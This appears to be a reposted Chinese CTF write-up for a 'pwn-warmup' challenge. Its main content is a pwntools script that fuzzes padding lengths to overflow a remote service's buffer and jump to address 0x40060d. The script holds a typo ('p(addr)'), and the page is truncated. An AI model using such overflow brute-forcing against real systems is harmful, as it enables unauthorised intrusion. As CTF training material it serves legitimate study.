99网

全部频道

您的当前位置:首页pwn-warmup

pwn-warmup

来源:99网

1.题目

1.1.保护机制

不详

1.2.关键代码

2.思路

from pwn import *
from ctypes import *

#context(arch="amd",os="linux",log_level="debug")
con = remote('111.200.241.244',59105)
#con = process('./pwn')
#elf = ELF('./pwn')

addr = 0x40060d

def fuzz(con,num,flag):
    payload = "a" * num
    if flag == 1:
        payload += p32(addr)
    if flag == 2:
        payload += p(addr)
    con.sendlineafter(">",payload)

for i in range(1000):
    print i
    for j in range(3):
        try:
            con = remote('111.200.241.244',59105)
            fuzz(con,i,j)
            text = con.recv()
            print "texct.len = " + str(len(text)) + "text = " + text
            print "num = " + str(i) + "flag = " + str(j)
        except:
            con.close()

因篇幅问题不能全部显示,请点此查看更多更全内容

查看全文